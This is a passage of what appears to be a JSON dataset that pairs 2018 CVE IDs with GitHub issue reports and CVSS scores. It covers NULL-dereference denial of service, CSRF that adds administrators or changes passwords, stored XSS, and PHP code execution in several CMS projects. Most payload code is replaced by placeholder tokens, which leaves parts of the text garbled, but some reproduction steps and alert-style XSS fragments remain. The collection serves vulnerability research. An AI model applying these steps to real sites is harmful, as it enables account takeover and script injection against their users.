PATHTAG NUMBERTAG d NUMBERTAG d0 in main (argc NUMBERTAG arg NUMBERTAG f NUMBERTAG at PATHTAG ERRORTAG NUMBERTAG ffff NUMBERTAG e1 in __libc_start_main (main NUMBERTAG d NUMBERTAG d APITAG , argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG d3a in _start () Registers: ra NUMBERTAG rb NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG ffff NUMBERTAG b NUMBERTAG rdi NUMBERTAG ffff NUMBERTAG f3f NUMBERTAG rbp NUMBERTAG fffffff NUMBERTAG fffffff NUMBERTAG rsp NUMBERTAG fffffff NUMBERTAG fffffff NUMBERTAG r NUMBERTAG ffff NUMBERTAG r NUMBERTAG fffffff7aac NUMBERTAG r NUMBERTAG r NUMBERTAG bbc NUMBERTAG r NUMBERTAG d NUMBERTAG r NUMBERTAG fffffffe NUMBERTAG r NUMBERTAG ffff NUMBERTAG c NUMBERTAG r NUMBERTAG ffff NUMBERTAG f NUMBERTAG rip NUMBERTAG bc NUMBERTAG bc NUMBERTAG APITAG eflags NUMBERTAG IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG APITAG info NUMBERTAG bc NUMBERTAG APITAG mov eax, dword ptr [ra NUMBERTAG bc NUMBERTAG APITAG lea edx, [ra NUMBERTAG bc NUMBERTAG APITAG mov rax, qword ptr [rbp NUMBERTAG bc NUMBERTAG APITAG mov dword ptr [rax], ed NUMBERTAG bc NUMBERTAG b APITAG mov rax, qword ptr [rbp NUMBERTAG bc NUMBERTAG f APITAG mov eax, dword ptr [ra NUMBERTAG bc NUMBERTAG APITAG test eax, ea NUMBERTAG bc NUMBERTAG APITAG jne zend_array_destroy NUMBERTAG APITAG NUMBERTAG bc NUMBERTAG APITAG mov rax, qword ptr [rbp NUMBERTAG bc NUMBERTAG APITAG mov qword ptr [rbp NUMBERTAG ra NUMBERTAG bc NUMBERTAG b APITAG mov rax, qword ptr [rbp NUMBERTAG static zend_always_inline void i_zval_ptr_dtor(zval zval_ptr ZEND_FILE_LINE_DC NUMBERTAG if (Z_REFCOUNTED_P(zval_ptr NUMBERTAG zend_refcounted ref = Z_COUNTED_P(zval_ptr NUMBERTAG if (! GC_REFCOUNT(ref NUMBERTAG zval_dtor_func(ref ZEND_FILE_LINE_RELAY_CC NUMBERTAG else NUMBERTAG gc_check_possible_root(ref NUMBERTAG I am not sure, but I believe that with this issue a APITAG on an arbitrary address(using _val_dtor_func) can be done, so maybe this can be a vulnerability (but as I said, I am not sure). Test script: APITAG unpack($sor); echo \"[+] Swoole Unserialized: \"; var_dump($ser); //var_dump($obj >unpack($test)); APITAG NUMBERTAG",
  23643. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23644. "severity": "HIGH",
  23645. "baseScore": 7.5,
  23646. "impactScore": 3.6,
  23647. "exploitabilityScore": 3.9
  23648. },
  23649. {
  23650. "CVE_ID": "CVE-2018-15504",
  23651. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/264",
  23652. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/264",
  23653. "Repo_new": "embedthis/goahead",
  23654. "Issue_Created_At": "2018-02-06T02:09:15Z",
  23655. "description": "NULL dereference for invalid Host and If Modified headers. Overview A security vulnerability affecting APITAG versions NUMBERTAG up to and including NUMBERTAG with specially crafted if modified or host headers has been identified. This bulletin discusses this flaw and its implications. Summary A HTTP POST request with specially crafted, invalid if modified and/or Host header fields may cause a NULL dereferences and thus cause a denial of service. Description If the \"host\" field of a http request does not contain a closing IP NUMBERTAG character a NULL dereference will occur. If the \"if modified since\" or \"if unmodified since\" headers contain an invalid time such that the month decodes to be greater than NUMBERTAG a NULL dereference will occur. Threat Scope Versions up to and including NUMBERTAG Fixed in NUMBERTAG Severity Medium. An attacker could cause a denial of service. Remedy Apply the quick patch below to APITAG NUMBERTAG to NUMBERTAG Alternatively, upgrade to APITAG NUMBERTAG Quick Patch In socket.c: CODETAG In time.c: CODETAG Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
  23656. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23657. "severity": "HIGH",
  23658. "baseScore": 7.5,
  23659. "impactScore": 3.6,
  23660. "exploitabilityScore": 3.9
  23661. },
  23662. {
  23663. "CVE_ID": "CVE-2018-15504",
  23664. "Issue_Url_old": "https://github.com/embedthis/appweb/issues/605",
  23665. "Issue_Url_new": "https://github.com/embedthis/appweb/issues/605",
  23666. "Repo_new": "embedthis/appweb",
  23667. "Issue_Created_At": "2018-02-06T02:00:26Z",
  23668. "description": "NULL dereference for invalid Host and If Modified headers. Overview A security vulnerability affecting Appweb versions up to and including NUMBERTAG with specially crafted if modified or host headers has been identified. This bulletin discusses this flaw and its implications. Summary A HTTP POST request with specially crafted, invalid if modified and/or Host header fields may cause a NULL dereferences and thus cause a denial of service. Description If the \"host\" field of a http request does not contain a closing IP NUMBERTAG character a NULL dereference will occur. If the \"if modified since\" or \"if unmodified since\" headers contain an invalid time such that the month decodes to be greater than NUMBERTAG a NULL dereference will occur. Threat Scope Versions up to and including NUMBERTAG Fixed in NUMBERTAG Severity Medium. An attacker could cause a denial of service. Remedy Apply the quick patch below to Appweb NUMBERTAG to NUMBERTAG Alternatively, upgrade to Appweb NUMBERTAG when it is released. APITAG NUMBERTAG is highly compatible with Appweb NUMBERTAG and upgrading should be straightforward. Quick Patch CODETAG Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
  23669. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23670. "severity": "HIGH",
  23671. "baseScore": 7.5,
  23672. "impactScore": 3.6,
  23673. "exploitabilityScore": 3.9
  23674. },
  23675. {
  23676. "CVE_ID": "CVE-2018-15560",
  23677. "Issue_Url_old": "https://github.com/Legrandin/pycryptodome/issues/198",
  23678. "Issue_Url_new": "https://github.com/legrandin/pycryptodome/issues/198",
  23679. "Repo_new": "legrandin/pycryptodome",
  23680. "Issue_Created_At": "2018-08-17T15:03:22Z",
  23681. "description": "Integer overflow vulnerability in pycryptodome module. APITAG pycryptodome module in python APITAG the following poc python poc.py APITAG NUMBERTAG python will APITAG fault) APITAG vulnerability analysis reference: FILETAG",
  23682. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23683. "severity": "HIGH",
  23684. "baseScore": 7.5,
  23685. "impactScore": 3.6,
  23686. "exploitabilityScore": 3.9
  23687. },
  23688. {
  23689. "CVE_ID": "CVE-2018-15564",
  23690. "Issue_Url_old": "https://github.com/daveismyname/simple-cms/issues/4",
  23691. "Issue_Url_new": "https://github.com/dcblogdev/simple-cms/issues/4",
  23692. "Repo_new": "dcblogdev/simple-cms",
  23693. "Issue_Created_At": "2018-08-08T04:05:46Z",
  23694. "description": "simple cms has Cross site request forgery. URLTAG I can delete any page when I send the url to administrator. I can also use the Short APITAG to encode the url. FILETAG",
  23695. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23696. "severity": "HIGH",
  23697. "baseScore": 8.8,
  23698. "impactScore": 5.9,
  23699. "exploitabilityScore": 2.8
  23700. },
  23701. {
  23702. "CVE_ID": "CVE-2018-15565",
  23703. "Issue_Url_old": "https://github.com/daveismyname/simple-cms/issues/3",
  23704. "Issue_Url_new": "https://github.com/dcblogdev/simple-cms/issues/3",
  23705. "Repo_new": "dcblogdev/simple-cms",
  23706. "Issue_Created_At": "2018-08-08T03:57:57Z",
  23707. "description": "simple cms has Cross site request forgery. URLTAG I can add page when admin click the html file. payload: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
  23708. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23709. "severity": "HIGH",
  23710. "baseScore": 8.8,
  23711. "impactScore": 5.9,
  23712. "exploitabilityScore": 2.8
  23713. },
  23714. {
  23715. "CVE_ID": "CVE-2018-15565",
  23716. "Issue_Url_old": "https://github.com/daveismyname/simple-cms/issues/2",
  23717. "Issue_Url_new": "https://github.com/dcblogdev/simple-cms/issues/2",
  23718. "Repo_new": "dcblogdev/simple-cms",
  23719. "Issue_Created_At": "2018-08-08T03:50:41Z",
  23720. "description": "simple cms has Unauthorized Access. FILETAG This url is used to log in admin. But I can access FILETAG without logging admin. And I can also add page. FILETAG FILETAG",
  23721. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23722. "severity": "HIGH",
  23723. "baseScore": 8.8,
  23724. "impactScore": 5.9,
  23725. "exploitabilityScore": 2.8
  23726. },
  23727. {
  23728. "CVE_ID": "CVE-2018-15566",
  23729. "Issue_Url_old": "https://github.com/fmsdwifull/tp5cms/issues/2",
  23730. "Issue_Url_new": "https://github.com/fmsdwifull/tp5cms/issues/2",
  23731. "Repo_new": "fmsdwifull/tp5cms",
  23732. "Issue_Created_At": "2018-08-10T07:19:56Z",
  23733. "description": "tp5cms NUMBERTAG has XSS vulnerability in input FILETAG",
  23734. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  23735. "severity": "MEDIUM",
  23736. "baseScore": 6.1,
  23737. "impactScore": 2.7,
  23738. "exploitabilityScore": 2.8
  23739. },
  23740. {
  23741. "CVE_ID": "CVE-2018-15568",
  23742. "Issue_Url_old": "https://github.com/fmsdwifull/tp5cms/issues/3",
  23743. "Issue_Url_new": "https://github.com/fmsdwifull/tp5cms/issues/3",
  23744. "Repo_new": "fmsdwifull/tp5cms",
  23745. "Issue_Created_At": "2018-08-10T10:05:11Z",
  23746. "description": "tp5cms NUMBERTAG has Cross site request forgery. I can delete category via catid when admin click the csrf html file. CSRF HTML: CODETAG FILETAG",
  23747. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23748. "severity": "HIGH",
  23749. "baseScore": 8.8,
  23750. "impactScore": 5.9,
  23751. "exploitabilityScore": 2.8
  23752. },
  23753. {
  23754. "CVE_ID": "CVE-2018-15570",
  23755. "Issue_Url_old": "https://github.com/caokang/waimai/issues/4",
  23756. "Issue_Url_new": "https://github.com/caokang/waimai/issues/4",
  23757. "Repo_new": "caokang/waimai",
  23758. "Issue_Created_At": "2018-08-07T01:50:56Z",
  23759. "description": "thre is a store xss at the information of goods. after logged as admin ,thre is a store xss at the information of goods the attacked url: URLTAG the fcname is attacked post NUMBERTAG Content Disposition: form data; name=\"fcname\" \u00e7\u00be\u008e\u00e5\u0091\u00b3\u00e6\u00b1\u0089\u00e5\u00a0 APITAG APITAG NUMBERTAG Content Disposition: form data; name=\"fcid NUMBERTAG Content Disposition: form data; name=\"fcsort NUMBERTAG APITAG APITAG",
  23760. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  23761. "severity": "MEDIUM",
  23762. "baseScore": 4.8,
  23763. "impactScore": 2.7,
  23764. "exploitabilityScore": 1.7
  23765. },
  23766. {
  23767. "CVE_ID": "CVE-2018-15603",
  23768. "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/2",
  23769. "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/2",
  23770. "Repo_new": "victoralagwu/cmssite",
  23771. "Issue_Created_At": "2018-08-20T07:50:29Z",
  23772. "description": "There have Storage type XSS vulnerability that can excute javascript. Here is a XSS vulnerability. No login required. Just need to open an article and comment on it. For example\uff0cthis article\uff1a FILETAG Add comments here > FILETAG When I click Submit\uff0cit will pop up XSS > FILETAG Here is the page source code > FILETAG",
  23773. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  23774. "severity": "MEDIUM",
  23775. "baseScore": 6.1,
  23776. "impactScore": 2.7,
  23777. "exploitabilityScore": 2.8
  23778. },
  23779. {
  23780. "CVE_ID": "CVE-2018-15607",
  23781. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1255",
  23782. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1255",
  23783. "Repo_new": "imagemagick/imagemagick",
  23784. "Issue_Created_At": "2018-08-21T06:29:23Z",
  23785. "description": "APITAG NUMBERTAG A hang in convert. Prerequisites [\u221a ] I have written a descriptive issue title [ \u221a] I have verified that I am using the latest version of APITAG [ \u221a] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG I use the fuzz tool test the newest version of APITAG I found a crash that will cause the program hang(more than ten minutes),and the CPU and memory will be APITAG that the poc only have NUMBERTAG bytes. Steps to Reproduce APITAG Inter(R) Core(TM) i NUMBERTAG CPU NUMBERTAG GHz NUMBERTAG G RAM NUMBERTAG G Disk APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Linu NUMBERTAG generic APITAG Ubuntu SMP Thu Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: looking forward to hearing from you soon:) APITAG",
  23786. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23787. "severity": "MEDIUM",
  23788. "baseScore": 6.5,
  23789. "impactScore": 3.6,
  23790. "exploitabilityScore": 2.8
  23791. },
  23792. {
  23793. "CVE_ID": "CVE-2018-15747",
  23794. "Issue_Url_old": "https://github.com/prasmussen/glot-code-runner/issues/15",
  23795. "Issue_Url_new": "https://github.com/prasmussen/glot-code-runner/issues/15",
  23796. "Repo_new": "prasmussen/glot-code-runner",
  23797. "Issue_Created_At": "2018-08-23T09:11:20Z",
  23798. "description": "Arbitrarily code execute. This program doesn't limit the execution of command, we can run arbitrarily command on this runner. payload: CODETAG output: ERRORTAG If this program run on a website, it will cause remote command execution. For example FILETAG",
  23799. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23800. "severity": "CRITICAL",
  23801. "baseScore": 9.8,
  23802. "impactScore": 5.9,
  23803. "exploitabilityScore": 3.9
  23804. },
  23805. {
  23806. "CVE_ID": "CVE-2018-15834",
  23807. "Issue_Url_old": "https://github.com/radare/radare2/issues/11274",
  23808. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/11274",
  23809. "Repo_new": "radareorg/radare2",
  23810. "Issue_Created_At": "2018-08-27T11:44:47Z",
  23811. "description": "memory corruption in flirt signature loading. memory corruption in flirt signature loading Work environment | Questions | Answers | | | PATHTAG (mandatory) | gentoo NUMBERTAG File format of the file you reverse (mandatory) | N/A. | Architecture/bits of the file (mandatory) | N/A. | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG ge2df NUMBERTAG a8 commit: APITAG build NUMBERTAG Expected behavior Flirt database loading Actual behavior memory corruption Steps to reproduce the behavior APITAG Additional Logs, screenshots, source code, configuration dump, ... FILETAG",
  23812. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23813. "severity": "MEDIUM",
  23814. "baseScore": 5.5,
  23815. "impactScore": 3.6,
  23816. "exploitabilityScore": 1.8
  23817. },
  23818. {
  23819. "CVE_ID": "CVE-2018-15842",
  23820. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/679",
  23821. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/679",
  23822. "Repo_new": "wolfcms/wolfcms",
  23823. "Issue_Created_At": "2018-08-08T18:25:15Z",
  23824. "description": "Cross Site Scripting (XSS) Vulnerability in wolfcms NUMBERTAG Submitted by: Author: Ritesh kumar Email: EMAILTAG APITAG URLTAG Proof of Concept Hello, I would like to report a vulnerability that I discovered in wolfcms NUMBERTAG which can be exploited to perform Cross Site Scripting (XSS) attacks. The vulnerability exists due to insufficient sanitization in the \"slug\" parameter. The exploitation example below uses the APITAG APITAG function to display NUMBERTAG as alert text. Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source; the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. Vulnerability Type: Cross Site Scripting (XSS) Vendor of Product: wolfcms Affected Product Code Base: wolfcms ( URLTAG version NUMBERTAG Affected Component: URLTAG Vulnerable parameter: SLUG Attack Type: Remote Attack Vectors: Steps to reproduce the vulnerability: APITAG to wolfcms as admin user. APITAG the URL \" URLTAG \". APITAG on metadata button NUMBERTAG enter the malicious java script \u201c> APITAG alert NUMBERTAG APITAG into slug parameter NUMBERTAG click on save and close button, xss will be get executed and NUMBERTAG will be reflected on the browser. Additional information Wolf CMS version: DB type and version: HTTP server type and version: Please find the screenshots below NUMBERTAG Enter the malicious java script into the slug parameter. FILETAG NUMBERTAG click on save and close button. FILETAG NUMBERTAG After clicking on save and close button, the malicious java script payload will get executed and it will displayed on the browser. FILETAG Reference: URLTAG Author: RITESH KUMAR Additional information: Wolf CMS version NUMBERTAG PHP Version NUMBERTAG Apache Version NUMBERTAG Operating system: microsoft windows NUMBERTAG",
  23825. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  23826. "severity": "MEDIUM",
  23827. "baseScore": 4.8,
  23828. "impactScore": 2.7,
  23829. "exploitabilityScore": 1.7
  23830. },
  23831. {
  23832. "CVE_ID": "CVE-2018-15843",
  23833. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1293",
  23834. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1293",
  23835. "Repo_new": "getsimplecms/getsimplecms",
  23836. "Issue_Created_At": "2018-08-11T13:37:18Z",
  23837. "description": "Cross Site Scripting Vulnerability in APITAG CMS NUMBERTAG ulnerability name Cross APITAG Scripting. Severity: High Submitted By: Ritesh Kumar Email: EMAILTAG Vendor of Product: APITAG CMS Version NUMBERTAG Attack type: remote Description: Hello, I would like to report a vulnerability that I discovered in APITAG CMS NUMBERTAG which can be exploited to perform Cross Site Scripting (XSS) attacks. The vulnerability exists due to insufficient sanitization in the APITAG New Page\" parameter. The exploitation example below uses the APITAG APITAG function to display \"XSS\" as alert text. Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source; the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. STEPS TO REPRODUCE: APITAG to APITAG CMS APITAG the URL \" FILETAG \". APITAG on Create New Page button then it will be redirected to FILETAG NUMBERTAG enter the malicious java script \u201c> APITAG into Add New Page parameter and add some text in body part then save the page. APITAG view that page by clicking on view button, xss will be get executed and XSS will be reflected on the browser. PROOF OF CONCEPT NUMBERTAG Enter the malicious java script \u201c> APITAG into Add New Page and add some text in body part then click on save button. FILETAG NUMBERTAG click on view and view that page. FILETAG NUMBERTAG After clicking on VIEW button our XSS payload will bet get executed. FILETAG",
  23838. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  23839. "severity": "MEDIUM",
  23840. "baseScore": 4.8,
  23841. "impactScore": 2.7,
  23842. "exploitabilityScore": 1.7
  23843. },
  23844. {
  23845. "CVE_ID": "CVE-2018-15844",
  23846. "Issue_Url_old": "https://github.com/Vict00r/poc/issues/1",
  23847. "Issue_Url_new": "https://github.com/vict00r/poc/issues/1",
  23848. "Repo_new": "Vict00r/poc",
  23849. "Issue_Created_At": "2018-08-21T15:29:50Z",
  23850. "description": "APITAG NUMBERTAG allows CSRF to change the administrator account's pssword.. APITAG NUMBERTAG allows CSRF to change the administrator account's pssword. After the administrator login in,open the poc,the administrator account's password will been changed to NUMBERTAG POC\uff1a CODETAG",
  23851. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23852. "severity": "HIGH",
  23853. "baseScore": 8.8,
  23854. "impactScore": 5.9,
  23855. "exploitabilityScore": 2.8
  23856. },
  23857. {
  23858. "CVE_ID": "CVE-2018-15845",
  23859. "Issue_Url_old": "https://github.com/gleez/cms/issues/800",
  23860. "Issue_Url_new": "https://github.com/gleez/cms/issues/800",
  23861. "Repo_new": "gleez/cms",
  23862. "Issue_Created_At": "2018-08-10T10:14:29Z",
  23863. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page to add an administrator. poc\uff1a APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  23864. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23865. "severity": "HIGH",
  23866. "baseScore": 8.8,
  23867. "impactScore": 5.9,
  23868. "exploitabilityScore": 2.8
  23869. },
  23870. {
  23871. "CVE_ID": "CVE-2018-15847",
  23872. "Issue_Url_old": "https://github.com/choregus/puppyCMS/issues/12",
  23873. "Issue_Url_new": "https://github.com/choregus/puppycms/issues/12",
  23874. "Repo_new": "choregus/puppycms",
  23875. "Issue_Created_At": "2018-08-07T05:01:23Z",
  23876. "description": "There have XSS vulnerability that can excute javascript. There are NUMBERTAG SS vulnerabilities loading FILETAG sign in and select \"SETTINGS\", Insert the payload \"' APITAG alert NUMBERTAG APITAG \" in the add page /URL/ URL / link text and submit. open FILETAG line NUMBERTAG ERRORTAG",
  23877. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  23878. "severity": "MEDIUM",
  23879. "baseScore": 6.1,
  23880. "impactScore": 2.7,
  23881. "exploitabilityScore": 2.8
  23882. },
  23883. {
  23884. "CVE_ID": "CVE-2018-15848",
  23885. "Issue_Url_old": "https://github.com/Westbrookadmin/portfolioCMS/issues/1",
  23886. "Issue_Url_new": "https://github.com/westbrookadmin/portfoliocms/issues/1",
  23887. "Repo_new": "westbrookadmin/portfoliocms",
  23888. "Issue_Created_At": "2018-08-16T05:39:28Z",
  23889. "description": "There are two CSRF vulnerabilities that can create new pages or update the website settings. APITAG is a CSRF vulnerability that can create new pages via APITAG poc: APITAG create a new page ERRORTAG APITAG is a CSRF vulnerability that can update the website settings via FILETAG . poc: APITAG update the website settings CODETAG",
  23890. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23891. "severity": "HIGH",
  23892. "baseScore": 8.8,
  23893. "impactScore": 5.9,
  23894. "exploitabilityScore": 2.8
  23895. },
  23896. {
  23897. "CVE_ID": "CVE-2018-15850",
  23898. "Issue_Url_old": "https://github.com/redaxo/redaxo4/issues/420",
  23899. "Issue_Url_new": "https://github.com/redaxo/redaxo4/issues/420",
  23900. "Repo_new": "redaxo/redaxo4",
  23901. "Issue_Created_At": "2018-08-11T03:39:03Z",
  23902. "description": "There is a CSRF vulnerability that can add an administrator. After administrator log in, there is a CSRF vulnerability that can add an administrator via PATHTAG poc FILETAG ERRORTAG",
  23903. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23904. "severity": "HIGH",
  23905. "baseScore": 8.8,
  23906. "impactScore": 5.9,
  23907. "exploitabilityScore": 2.8
  23908. },
  23909. {
  23910. "CVE_ID": "CVE-2018-15851",
  23911. "Issue_Url_old": "https://github.com/flexocms/flexo1.source/issues/25",
  23912. "Issue_Url_new": "https://github.com/flexocms/flexo1.source/issues/25",
  23913. "Repo_new": "flexocms/flexo1.source",
  23914. "Issue_Created_At": "2018-08-10T11:48:49Z",
  23915. "description": "There is a CSRF vulnerability that can add an administrator. After administrator log in, there is a CSRF vulnerability that can add an administrator via PATHTAG poc FILETAG CODETAG",
  23916. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23917. "severity": "HIGH",
  23918. "baseScore": 8.8,
  23919. "impactScore": 5.9,
  23920. "exploitabilityScore": 2.8
  23921. },
  23922. {
  23923. "CVE_ID": "CVE-2018-15869",
  23924. "Issue_Url_old": "https://github.com/hashicorp/packer/issues/6584",
  23925. "Issue_Url_new": "https://github.com/hashicorp/packer/issues/6584",
  23926. "Repo_new": "hashicorp/packer",
  23927. "Issue_Created_At": "2018-08-13T22:41:00Z",
  23928. "description": "Make \"owners\" field of source_ami_filter required: RFC. APITAG security team pointed out an interesting potential exploit where if you request an amazon AMI via a source_ami_filter, but don't have \"owner\" selected, you can accidentally use a malicious base image instead of one from your own organization or a trusted vendor. The impact of making the \"owner\" field required would be low for the users (I strongly suspect that a majority of people using the filter already define the owner field) but could save users from making a potentially dangerous mistake. I think we should have Packer fail during validation with an error that says this field must be designated; if we decide that there is a valid use case where people may not want to have to set this field, we could potentially allow an opt out like setting \"owner\" to \"any\" but honestly I can't think of a situation where this really makes a great deal of sense. I'm going to slate this for NUMBERTAG but I'd like to hear community thoughts.",
  23929. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  23930. "severity": "MEDIUM",
  23931. "baseScore": 5.3,
  23932. "impactScore": 1.4,
  23933. "exploitabilityScore": 3.9
  23934. },
  23935. {
  23936. "CVE_ID": "CVE-2018-15870",
  23937. "Issue_Url_old": "https://github.com/libming/libming/issues/122",
  23938. "Issue_Url_new": "https://github.com/libming/libming/issues/122",
  23939. "Repo_new": "libming/libming",
  23940. "Issue_Created_At": "2018-03-09T06:36:38Z",
  23941. "description": "Invalid memory address dereference in function APITAG and APITAG (in APITAG Hi, i found a issue in the libming NUMBERTAG it is crashed by function APITAG to APITAG It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  23942. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23943. "severity": "MEDIUM",
  23944. "baseScore": 6.5,
  23945. "impactScore": 3.6,
  23946. "exploitabilityScore": 2.8
  23947. },
  23948. {
  23949. "CVE_ID": "CVE-2018-15871",
  23950. "Issue_Url_old": "https://github.com/libming/libming/issues/123",
  23951. "Issue_Url_new": "https://github.com/libming/libming/issues/123",
  23952. "Repo_new": "libming/libming",
  23953. "Issue_Created_At": "2018-03-09T06:38:19Z",
  23954. "description": "Invalid memory address dereference in APITAG and APITAG (in APITAG Hi, i found a issue in the libming NUMBERTAG It's similar to URLTAG but it is crashed by function APITAG to APITAG .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  23955. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23956. "severity": "MEDIUM",
  23957. "baseScore": 6.5,
  23958. "impactScore": 3.6,
  23959. "exploitabilityScore": 2.8
  23960. },
  23961. {
  23962. "CVE_ID": "CVE-2018-15886",
  23963. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/455",
  23964. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/455",
  23965. "Repo_new": "monstra-cms/monstra",
  23966. "Issue_Created_At": "2018-08-27T13:48:24Z",
  23967. "description": "php code execution in snippets modul. Hello sir, I have found a php code execution vulnerability in Monstra APITAG I was able to execute PHP command. visit: URLTAG In this page\uff0cinput <?php APITAG example: APITAG then visit\uff1a FILETAG APITAG",
  23968. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  23969. "severity": "HIGH",
  23970. "baseScore": 7.2,
  23971. "impactScore": 5.9,
  23972. "exploitabilityScore": 1.2
  23973. },
  23974. {
  23975. "CVE_ID": "CVE-2018-15890",
  23976. "Issue_Url_old": "https://github.com/ethereum/ethereumj/issues/1161",
  23977. "Issue_Url_new": "https://github.com/ethereum/ethereumj/issues/1161",
  23978. "Repo_new": "ethereum/ethereumj",
  23979. "Issue_Created_At": "2018-08-20T14:48:16Z",
  23980. "description": "Unsafe Java object serialization. What's wrong Ethash class uses pure Java object serialization to store light and full datasets. As MENTIONTAG pointed out, this serialization in its pure form can be exploited, additional information can be found here URLTAG . However, in this particular case it doesn't look valuable for attacker. How to fix Looks like the easiest way is to use custom serialization.",
  23981. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23982. "severity": "CRITICAL",
  23983. "baseScore": 9.8,
  23984. "impactScore": 5.9,
  23985. "exploitabilityScore": 3.9
  23986. },
  23987. {
  23988. "CVE_ID": "CVE-2018-15893",
  23989. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/149",
  23990. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/149",
  23991. "Repo_new": "wuzhicms/wuzhicms",
